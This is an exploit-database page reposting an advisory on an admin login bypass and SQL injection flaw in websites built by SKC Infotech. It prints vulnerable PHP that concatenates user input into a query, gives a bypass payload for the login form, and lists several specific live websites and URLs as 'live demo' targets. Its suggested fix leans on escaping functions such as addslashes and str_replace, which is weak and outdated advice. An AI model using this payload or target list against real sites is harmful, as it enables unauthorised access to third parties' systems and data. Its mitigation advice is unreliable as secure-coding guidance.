Advertisement






SKC Infotech Admin Bypass & SQL Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2024-02-08
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020039

Below is a copy:

SKC Infotech Admin Bypass & SQL Injection Vulnerability
# Exploit Title : SKC Infotech Admin Bypass & SQL Injection Vulnerability
# Discovered By : MrHoudini
# Contact Me : [email protected]
# Date : 08-02-2024
# Vendor Homepage : https://skcinfotech.in
[!] Description.:
SQL injection attacks usually targets database and all of them are the results of programming errors.
If programmer couldn't checked the inputs correctly, so the attacker can send his/her commands to database.
If programmer do this errors at admin page input and the inputs haven't been checked correctly,
occur a very bad thing that allow attacker login to administrator panel
with combination the passwords that turn the result to True in php.
Request Method :
[+] POST
Vulnerable Module:
[+] Login
Vulnerable Parameter:
[+](username) and (Password)
==================================================
[!] Bug.........:
<?php
require_once('any.php');
if($_POST['submit'])
{
$user=$_POST['user'];
$pswd=$_POST['pswd'];
$result=mysql_query("select * from login where user='$user' and pswd='$pswd'");
$rowcount=mysql_num_rows($result);
if($rowcount>0)
{
header('Location:any.php');
}
else
{
echo "bad user";
}
}
?>
==================================================
[!] PoC.........:
To bypass the admin login: '= 'or'
==================================================
[!] Live Demo. For Admin Page :
https://accountsassociate.in/admin/
https://sangitabiotech.com/admin/
Url Target Admin Panel : http://site.com/admin/
[!] Live Demo. For SQL Injection :
https://sangitabiotech.com/product.php?prod_id=22
https://sbdschess.in/gallery.php?menu=5
==================================================
[!] Solution...:
PHP functions can be averted with the bug
Check input variable:
--ctype_digit
--ctype_alnum
And other ctype & gettype family functions
*String entries with the database functions
--mysql_real_escape_string or sqlite_escape_string or ....
-If functions are not available in the database
--str_replace , addslashes

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.